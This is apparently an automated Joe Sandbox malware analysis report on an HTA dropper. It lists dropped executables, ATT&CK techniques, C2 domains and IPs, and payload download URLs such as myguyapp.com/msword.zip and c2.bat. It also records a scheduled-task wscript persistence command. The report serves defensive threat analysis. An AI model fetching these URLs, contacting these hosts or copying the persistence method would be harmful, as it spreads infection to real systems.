Source: Yara match	File source: 00000018.00000003.3881856038.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.4500241219.00000000029BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3826189129.0000000001B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.4500241219.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.3881856038.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Carter.pif PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7416, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AF696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	24_2_00AF696E
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif	Code function: 24_2_00AF6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	24_2_00AF6E32
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_0029696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	32_2_0029696E
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	Code function: 32_2_00296E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	32_2_00296E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	11 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	21 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	21 Access Token Manipulation	2 Software Packing	NTDS	29 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	2 Registry Run Keys / Startup Folder	212 Process Injection	1 DLL Side-Loading	LSA Secrets	51 Security Software Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	111 Masquerading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	2 Valid Accounts	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	41 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
c2.hta	8%	ReversingLabs	Document-HTML.Exploit.Heuristic

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	8%	ReversingLabs
C:\Users\user\AppData\Local\Temp\220239\Carter.pif	8%	ReversingLabs
C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\msword\msword.exe	8%	ReversingLabs

Source	Detection	Scanner	Label
https://myguyapp.com/msword.zip	100%	Avira URL Cloud	malware
https://myguyapp.com/msword.zip=	0%	Avira URL Cloud	safe
https://myguyapp.com/ms	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGE	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipr	0%	Avira URL Cloud	safe
https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGEUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPR	0%	Avira URL Cloud	safe
https://myguyapp.com/mswor	0%	Avira URL Cloud	safe
https://myguyapp.com/f.pdfQ	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PIVF	0%	Avira URL Cloud	safe
https://myguyapp.com/	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipB	0%	Avira URL Cloud	safe
https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGEUSERDOMAIN_ROAMINGPROFILE=userpv	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSW	0%	Avira URL Cloud	safe
https://myguyapp.com/f.pdfZ(	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGEUSERDOMAIN_ROAMINGPR	0%	Avira URL Cloud	safe
https://myguyapp.com/f.pdfQ(	0%	Avira URL Cloud	safe
https://myguyapp.com/c2.bat-d	0%	Avira URL Cloud	safe
me-work.com	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipCx	0%	Avira URL Cloud	safe
https://myguyapp.com/f.pdfi)	0%	Avira URL Cloud	safe
https://myguyapp.com/f.pdf	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https:	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zip#.	100%	Avira URL Cloud	malware
https://myguyapp.com/c2.bat	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
me-work.com	87.120.117.152	true	true	unknown
myguyapp.com	193.26.115.21	true	true	unknown
x1.i.lencr.org	unknown	unknown	false	high
dwLscOsEZmpbOxr.dwLscOsEZmpbOxr	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://myguyapp.com/msword.zip	true	Avira URL Cloud: malware	unknown
me-work.com	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/f.pdf	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.bat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://myguyapp.com/	mshta.exe, 00000000.00000003.2153198668.0000000000C96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2178093355.0000000000C96000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/mswor	tasklist.exe, 00000011.00000002.2579186939.00000000031A0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zip=	cmd.exe, 0000001A.00000002.2608593746.0000000003070000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmp, DanielPulse.scr, 00000020.00000002.2658129274.00000000002E9000.00000002.00000001.01000000.00000011.sdmp, DanielPulse.scr, 00000022.00000000.2721397861.00000000002E9000.00000002.00000001.01000000.00000011.sdmp, Missouri.14.dr, Carter.pif.15.dr	false		high
https://myguyapp.com/ms	cmd.exe, 0000001D.00000002.2608151445.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.7.dr	false		high
https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGEUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPR	Carter.pif, 00000018.00000003.2607057957.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607278700.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2606962712.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607612929.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607017088.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2606871743.0000000001585000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607654794.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607810711.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2606840417.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607734392.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2607186070.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2606748916.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3826598590.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3826655024.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3826687495.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2606938161.0000000001584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2610507538.0000000001584000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGE	msword.exe, 0000000E.00000003.2611574966.0000000000804000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000E.00000002.2613025596.0000000000804000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipr	Carter.pif, 00000018.00000002.4499444549.0000000001748000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/f.pdfQ	tasklist.exe, 00000013.00000002.2586958016.0000000000C88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PIVF	tasklist.exe, 00000013.00000002.2587094931.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2585873048.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2585378304.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2585687735.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	msword.exe, 0000000E.00000002.2611976282.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe, 0000000E.00000000.2551149578.0000000000408000.00000002.00000001.01000000.0000000D.sdmp, msword.exe.12.dr	false		high
https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGEUSERDOMAIN_ROAMINGPROFILE=userpv	RegAsm.exe, 00000023.00000002.4499684136.0000000000E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	msword.exe, 0000000E.00000003.2557835042.0000000002A38000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.2605347135.00000000044F4000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3882027473.000000000424F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000003.3881997130.0000000004246000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 00000018.00000002.4500843743.0000000004250000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.15.dr	false		high
https://myguyapp.com/f.pdfQ(	RegAsm.exe, 00000023.00000002.4498969809.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipB	Carter.pif, 00000018.00000002.4499444549.0000000001748000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/f.pdfZ(	RegAsm.exe, 00000023.00000002.4498969809.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/c2.bat-d	mshta.exe, 00000000.00000002.2177728509.0000000000BBF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSERDOMAIN=PIVFAGEUSERDOMAIN_ROAMINGPR	RegAsm.exe, 00000023.00000002.4498969809.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4498796106.0000000000790000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000023.00000002.4498969809.0000000000BE3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/f.pdfUSW	tasklist.exe, 00000011.00000003.2578071945.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2578186921.0000000002EA3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipCx	tasklist.exe, 00000011.00000003.2578071945.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2578208730.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000002.2578991564.0000000002E9F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000011.00000003.2578273267.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/f.pdfq	tasklist.exe, 00000013.00000003.2585378304.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.2585540846.0000000000CA0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.2587033136.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://myguyapp.com/f.pdfi)	RegAsm.exe, 00000023.00000002.4498969809.0000000000B18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsm.exe, 00000023.00000002.4500241219.0000000002971000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myguyapp.com/msword.zipurl2=https:	Carter.pif, 00000018.00000002.4499409422.00000000016A0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zip#.	cmd.exe, 0000001D.00000002.2608151445.0000000002E80000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.120.117.152	me-work.com	Bulgaria		25206	UNACS-AS-BG8000BurgasBG	true
193.26.115.21	myguyapp.com	Netherlands		46261	QUICKPACKETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572230
Start date and time:	2024-12-10 09:47:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	c2.hta
Detection:	MAL
Classification:	mal100.troj.expl.evad.winHTA@65/62@4/2
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 100% Number of executed functions: 108 Number of non-executed functions: 294
Cookbook Comments:	Found application associated with file extension: .hta Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.20.60.204, 172.64.41.3, 162.159.61.3, 52.6.155.20, 3.233.129.217, 3.219.243.226, 52.22.41.97, 23.195.39.65, 199.232.210.172, 2.19.198.75, 2.19.198.58, 23.32.238.160, 2.19.198.48, 2.19.198.74, 2.19.198.65, 23.32.238.161, 23.32.238.163, 23.32.238.146, 2.19.198.40, 23.32.238.122, 2.19.198.42, 23.32.238.130, 23.32.238.144, 23.32.238.153, 23.32.238.115, 23.218.208.109, 13.107.246.63, 4.245.163.56, 23.47.168.24
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Execution Graph export aborted for target mshta.exe, PID 3992 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: c2.hta

Simulations

Behavior and APIs

Time	Type	Description
03:47:59	API Interceptor	1x Sleep call for process: mshta.exe modified
03:48:00	API Interceptor	96x Sleep call for process: powershell.exe modified
03:48:15	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
03:49:28	API Interceptor	3571x Sleep call for process: Carter.pif modified
03:50:58	API Interceptor	723x Sleep call for process: RegAsm.exe modified
09:48:53	Task Scheduler	Run new task: Wagner path: wscript s>//B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
09:48:53	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
me-work.com	p5.hta	Get hash	malicious	XWorm	Browse	45.88.186.197
bg.microsoft.map.fastly.net	SC3sPWT51E.exe	Get hash	malicious	LummaC Stealer	Browse	199.232.214.172
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	199.232.214.172
	OrderSheet.xla.xlsx	Get hash	malicious	Unknown	Browse	199.232.210.172
	file.exe	Get hash	malicious	Stealc	Browse	199.232.210.172
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar	Browse	199.232.214.172
	file.exe	Get hash	malicious	AsyncRAT, VenomRAT	Browse	199.232.214.172
	lz3EbiqoK4.exe	Get hash	malicious	Quasar	Browse	199.232.214.172
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	199.232.210.172
	xMaSQ3Bn10.docx	Get hash	malicious	Unknown	Browse	199.232.214.172
	lLNOwu1HG4.js	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
QUICKPACKETUS	Play_VM-NowCRQW.html	Get hash	malicious	HTMLPhisher	Browse	172.82.129.154
	new.ini.ps1	Get hash	malicious	Unknown	Browse	167.88.162.71
	i586.elf	Get hash	malicious	Unknown	Browse	172.82.144.22
	sh4.elf	Get hash	malicious	Mirai	Browse	208.166.51.211
	mips.elf	Get hash	malicious	Unknown	Browse	103.136.150.114
	ppc.elf	Get hash	malicious	Unknown	Browse	103.136.150.114
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	192.255.97.148
	mpsl.elf	Get hash	malicious	Unknown	Browse	103.136.150.114
	harm5.elf	Get hash	malicious	Unknown	Browse	103.136.150.114
	mips.elf	Get hash	malicious	Unknown	Browse	103.136.150.114
UNACS-AS-BG8000BurgasBG	XUhf3m5FmK.exe	Get hash	malicious	XenoRAT	Browse	87.120.121.160
	plb2ptcqcI.doc	Get hash	malicious	XenoRAT	Browse	87.120.121.160
	file.exe	Get hash	malicious	Lokibot	Browse	87.120.113.235
	file.exe	Get hash	malicious	Lokibot	Browse	87.120.113.235
	TRANSFERENCIA COMPROBANTES.lnk	Get hash	malicious	XenoRAT	Browse	87.120.121.160
	TRANSFERENCIA COMPROBANTES.lnk	Get hash	malicious	XenoRAT	Browse	87.120.121.160
	Transferencia.lnk	Get hash	malicious	XenoRAT	Browse	87.120.121.160
	dHrrqccwkL.doc	Get hash	malicious	XenoRAT	Browse	87.120.121.160
	zVUq6L4FrV.doc	Get hash	malicious	XenoRAT	Browse	87.120.121.160
	Estado de cuenta.xls	Get hash	malicious	XenoRAT	Browse	87.120.121.160

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	iboka6.hta	Get hash	malicious	Unknown	Browse	193.26.115.21
	Statement 2024-11-29 (K07234).exe	Get hash	malicious	AgentTesla	Browse	193.26.115.21
	SALARY_RECEIPT.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.26.115.21
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	193.26.115.21
	aXxRRIGARH.exe	Get hash	malicious	Unknown	Browse	193.26.115.21
	aXxRRIGARH.exe	Get hash	malicious	Unknown	Browse	193.26.115.21
	Dfim58cp4J.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	193.26.115.21
	Wh2c6sgwRo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	193.26.115.21
	interior-design-villa-a23.lnk	Get hash	malicious	MalLnk	Browse	193.26.115.21
	Payment_Advice.vbs	Get hash	malicious	Unknown	Browse	193.26.115.21
37f463bf4616ecd445d4a1937da06e19	document.pif.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.26.115.21
	lFxGd66yDa.exe	Get hash	malicious	NetSupport RAT	Browse	193.26.115.21
	Jjv9ha2GKn.exe	Get hash	malicious	NetSupport RAT, DarkTortilla	Browse	193.26.115.21
	n09qkE6r6n.lnk	Get hash	malicious	Unknown	Browse	193.26.115.21
	DqEJwd61Uw.exe	Get hash	malicious	Zhark RAT	Browse	193.26.115.21
	List of required items and services pdf.vbs	Get hash	malicious	GuLoader, RHADAMANTHYS	Browse	193.26.115.21
	Revo.Uninstaller.Pro.v5.3.4.exe	Get hash	malicious	Unknown	Browse	193.26.115.21
	Revo.Uninstaller.Pro.v5.3.4.exe	Get hash	malicious	Unknown	Browse	193.26.115.21
	http://crissertaoericardo.com.br/images/document.pif.rar	Get hash	malicious	GuLoader	Browse	193.26.115.21
	tQoSuhQIdC.msi	Get hash	malicious	Unknown	Browse	193.26.115.21

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr	FwR7as4xUq.exe	Get hash	malicious	Unknown	Browse
	InsertSr.exe	Get hash	malicious	GO Backdoor	Browse
	vqMMwqCFZQ.exe	Get hash	malicious	Unknown	Browse
	fT0L8msd6q.exe	Get hash	malicious	Unknown	Browse
	fT0L8msd6q.exe	Get hash	malicious	Unknown	Browse
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse
	eddzD2MA12.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	file.exe	Get hash	malicious	XWorm	Browse
C:\Users\user\AppData\Local\Temp\220239\Carter.pif	FwR7as4xUq.exe	Get hash	malicious	Unknown	Browse
	InsertSr.exe	Get hash	malicious	GO Backdoor	Browse
	vqMMwqCFZQ.exe	Get hash	malicious	Unknown	Browse
	fT0L8msd6q.exe	Get hash	malicious	Unknown	Browse
	fT0L8msd6q.exe	Get hash	malicious	Unknown	Browse
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse
	qaHUaPUib8.exe	Get hash	malicious	Unknown	Browse
	eddzD2MA12.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	file.exe	Get hash	malicious	XWorm	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.146095526794848
Encrypted:	false
SSDEEP:	6:7adjWM+q2P92nKuAl9OmbnIFUt8Oan11Zmw+OanjWMVkwO92nKuAl9OmbjLJ:7WL+v4HAahFUt8Oo/+OoLV5LHAaSJ
MD5:	C7A8A14C7A175A601236BA49135930DE
SHA1:	56208E1FDD15CB8F5CFFF8FCC2879028403B76B7
SHA-256:	62136A7E2EB739473E7C50DE4D644CB0625274DCE135127428FBDE0AA17C1FD5
SHA-512:	04D95DF463B8D83A365CEAB2B7F81A2A0AD4A35EC6ED1517FDF73F8DEE05FD7B9F84AE492FF363992D51E73EB75F381412BB87D64F013565606E7AF25E3625F6
Malicious:	false
Preview:	2024/12/10-03:48:04.610 4ac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/10-03:48:04.616 4ac Recovering log #3.2024/12/10-03:48:04.616 4ac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.146095526794848
Encrypted:	false
SSDEEP:	6:7adjWM+q2P92nKuAl9OmbnIFUt8Oan11Zmw+OanjWMVkwO92nKuAl9OmbjLJ:7WL+v4HAahFUt8Oo/+OoLV5LHAaSJ
MD5:	C7A8A14C7A175A601236BA49135930DE
SHA1:	56208E1FDD15CB8F5CFFF8FCC2879028403B76B7
SHA-256:	62136A7E2EB739473E7C50DE4D644CB0625274DCE135127428FBDE0AA17C1FD5
SHA-512:	04D95DF463B8D83A365CEAB2B7F81A2A0AD4A35EC6ED1517FDF73F8DEE05FD7B9F84AE492FF363992D51E73EB75F381412BB87D64F013565606E7AF25E3625F6
Malicious:	false
Preview:	2024/12/10-03:48:04.610 4ac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/10-03:48:04.616 4ac Recovering log #3.2024/12/10-03:48:04.616 4ac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	338
Entropy (8bit):	5.134650030658265
Encrypted:	false
